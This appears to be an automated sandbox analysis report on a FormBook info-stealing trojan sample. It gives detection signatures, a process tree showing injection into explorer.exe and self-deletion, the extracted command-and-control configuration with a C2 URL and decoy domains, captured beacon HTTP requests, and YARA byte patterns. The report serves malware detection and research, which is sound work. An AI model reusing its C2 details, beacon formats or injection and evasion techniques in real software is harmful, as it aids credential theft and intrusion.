Loading ...

Play interactive tourEdit tour

Analysis Report GiG35Rwmz6

Overview

General Information

Sample Name:GiG35Rwmz6 (renamed file extension from none to exe)
Analysis ID:432733
MD5:b0901d0a6b90e6b371ba80e2c31ade52
SHA1:2f175d971e4d6f4938083a78de9be10eb6ba0e05
SHA256:08da4e7de40f2eec9cd1670e3db354d49d3101fd9ace7aaa5f99b235d2ce46ff
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • GiG35Rwmz6.exe (PID: 6564 cmdline: 'C:\Users\user\Desktop\GiG35Rwmz6.exe' MD5: B0901D0A6B90E6B371BA80E2C31ADE52)
    • GiG35Rwmz6.exe (PID: 6784 cmdline: C:\Users\user\Desktop\GiG35Rwmz6.exe MD5: B0901D0A6B90E6B371BA80E2C31ADE52)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 6044 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 4564 cmdline: /c del 'C:\Users\user\Desktop\GiG35Rwmz6.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.studiooculto.com/n8ud/"], "decoy": ["certification-plus.com", "linkedoutbook.com", "bethesdalashes.com", "blazingthenet.com", "lohmanphotogallery.com", "solidlinks.info", "alvingohproperty.com", "hometheaterplanning.com", "beoke.com", "ddthi.com", "floridamotorcyclemasons.net", "stither.com", "majorhumanities.com", "palpaynaira.com", "webossgoo.com", "thebrck.com", "crackhook.com", "363dahlia.com", "mybusiness-plus.com", "seatachawaiianbarbecue.com", "uoekiqliea.net", "zyslz.com", "frightvision.online", "gordonenergysolutions.com", "matthewcoyte.com", "hackingnews.info", "royallondonhair.com", "thegioirc.com", "856380588.xyz", "popitara.com", "luisxe.info", "cbdthc.domains", "869bernardilane.com", "airikit.com", "centraldomusmatera.com", "onlinecreditnow.com", "ilamaths.com", "janeharriganhorn.com", "fullapologies.com", "xpfisioterapia.com", "spring-boot.com", "wrighttransportllc.com", "nemahealthcare.com", "taxikuka.com", "promoterss.com", "kirklandtroll.com", "aviationbrothers.com", "fylldagenebergen.com", "vycocover.com", "cookingsecret.net", "intentguild.com", "athenalim.com", "nothingoingapart.info", "neurosene.com", "doctorelizabethwise.com", "lalamasks.cloud", "livemaharashtra24.com", "catrinettealyssandre.com", "wovkreations.com", "piapiadine.com", "uebfaushb.com", "curlupanddyesc.com", "seniorbenefits.support", "didyouswipe.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.0.GiG35Rwmz6.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.0.GiG35Rwmz6.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.GiG35Rwmz6.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18419:$sqlite3step: 68 34 1C 7B E1
        • 0x1852c:$sqlite3step: 68 34 1C 7B E1
        • 0x18448:$sqlite3text: 68 38 2A 90 C5
        • 0x1856d:$sqlite3text: 68 38 2A 90 C5
        • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
        4.2.GiG35Rwmz6.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.GiG35Rwmz6.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 10 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: GiG35Rwmz6.exeAvira: detected
          Found malware configurationShow sources
          Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.studiooculto.com/n8ud/"], "decoy": ["certification-plus.com", "linkedoutbook.com", "bethesdalashes.com", "blazingthenet.com", "lohmanphotogallery.com", "solidlinks.info", "alvingohproperty.com", "hometheaterplanning.com", "beoke.com", "ddthi.com", "floridamotorcyclemasons.net", "stither.com", "majorhumanities.com", "palpaynaira.com", "webossgoo.com", "thebrck.com", "crackhook.com", "363dahlia.com", "mybusiness-plus.com", "seatachawaiianbarbecue.com", "uoekiqliea.net", "zyslz.com", "frightvision.online", "gordonenergysolutions.com", "matthewcoyte.com", "hackingnews.info", "royallondonhair.com", "thegioirc.com", "856380588.xyz", "popitara.com", "luisxe.info", "cbdthc.domains", "869bernardilane.com", "airikit.com", "centraldomusmatera.com", "onlinecreditnow.com", "ilamaths.com", "janeharriganhorn.com", "fullapologies.com", "xpfisioterapia.com", "spring-boot.com", "wrighttransportllc.com", "nemahealthcare.com", "taxikuka.com", "promoterss.com", "kirklandtroll.com", "aviationbrothers.com", "fylldagenebergen.com", "vycocover.com", "cookingsecret.net", "intentguild.com", "athenalim.com", "nothingoingapart.info", "neurosene.com", "doctorelizabethwise.com", "lalamasks.cloud", "livemaharashtra24.com", "catrinettealyssandre.com", "wovkreations.com", "piapiadine.com", "uebfaushb.com", "curlupanddyesc.com", "seniorbenefits.support", "didyouswipe.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: GiG35Rwmz6.exeVirustotal: Detection: 40%Perma Link
          Source: GiG35Rwmz6.exeReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: GiG35Rwmz6.exeJoe Sandbox ML: detected
          Source: 4.0.GiG35Rwmz6.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.GiG35Rwmz6.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeUnpacked PE file: 0.2.GiG35Rwmz6.exe.3c0000.0.unpack
          Source: GiG35Rwmz6.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: GiG35Rwmz6.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.692755022.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: GiG35Rwmz6.exe, 00000004.00000002.729465784.000000000108F000.00000040.00000001.sdmp, help.exe, 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: GiG35Rwmz6.exe, 00000004.00000002.729465784.000000000108F000.00000040.00000001.sdmp, help.exe
          Source: Binary string: help.pdbGCTL source: GiG35Rwmz6.exe, 00000004.00000002.729233616.0000000000F60000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: GiG35Rwmz6.exe, 00000004.00000002.729233616.0000000000F60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.692755022.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.studiooculto.com/n8ud/
          Source: global trafficHTTP traffic detected: GET /n8ud/?vPE=5jrT8R0&hL=WvvELDNeXjXNSBNWuUY8Zfoe6Ppc+GsA8iptXd2KegdndXiZdpjCN7GBAWkC1K0OIvRU HTTP/1.1Host: www.intentguild.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ud/?hL=xx0OFN/A1LQZVCJMLzEbxnX8OnCdv1d2voKBm1sodMz7PL+00tIAVi4krCco92VzLf77&vPE=5jrT8R0 HTTP/1.1Host: www.didyouswipe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: IOFLOODUS IOFLOODUS
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: global trafficHTTP traffic detected: GET /n8ud/?vPE=5jrT8R0&hL=WvvELDNeXjXNSBNWuUY8Zfoe6Ppc+GsA8iptXd2KegdndXiZdpjCN7GBAWkC1K0OIvRU HTTP/1.1Host: www.intentguild.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ud/?hL=xx0OFN/A1LQZVCJMLzEbxnX8OnCdv1d2voKBm1sodMz7PL+00tIAVi4krCco92VzLf77&vPE=5jrT8R0 HTTP/1.1Host: www.didyouswipe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.intentguild.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Jun 2021 15:55:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000005.00000000.680176172.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041A060 NtClose,
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041A05A NtClose,
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0041A10A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC9540 NtReadFile,LdrInitializeThunk,
